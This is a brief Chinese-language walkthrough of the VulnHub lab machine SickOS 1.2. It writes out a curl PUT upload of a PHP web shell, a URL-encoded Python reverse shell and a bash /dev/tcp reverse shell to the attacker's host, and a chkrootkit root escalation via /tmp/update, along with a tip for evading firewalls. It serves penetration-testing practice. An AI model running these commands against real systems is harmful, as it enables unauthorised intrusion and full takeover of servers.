主机来源:www.vulnhub.com
下载地址:https://download.vulnhub.com/sickos/sick0s1.2.zip
用到的知识点:
PUT上传
chkrootkit提权
发现IP
安装成功后,查找此虚拟机的IP,我使用的是netdiscover
IP为10.0.3.144
nmap
没啥开的端口,从80开始,扫下目录,发现test目录,然后发现有PUT方法
上传
利用weevely来生成一个木马文件,weevely是kali中的PHP菜刀
连接
或者直接用curl命令来上传一个小马
curl -v -X PUT -d '<?php system($_GET["c"]); ?>' http://10.0.3.144/test/22.php
客户端监听,nc -nlvp 443
curl或者浏览器中访问
http://10.0.3.144/test/22.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%2210.0.3.141%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27
获得shell
提权
利用chkrootkit提权
写入文件
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.0.3.141/443 0>&1\n' >> /tmp/update
等待,获得root
为什么用443,是因为一般防火墙策略会只开很少的端口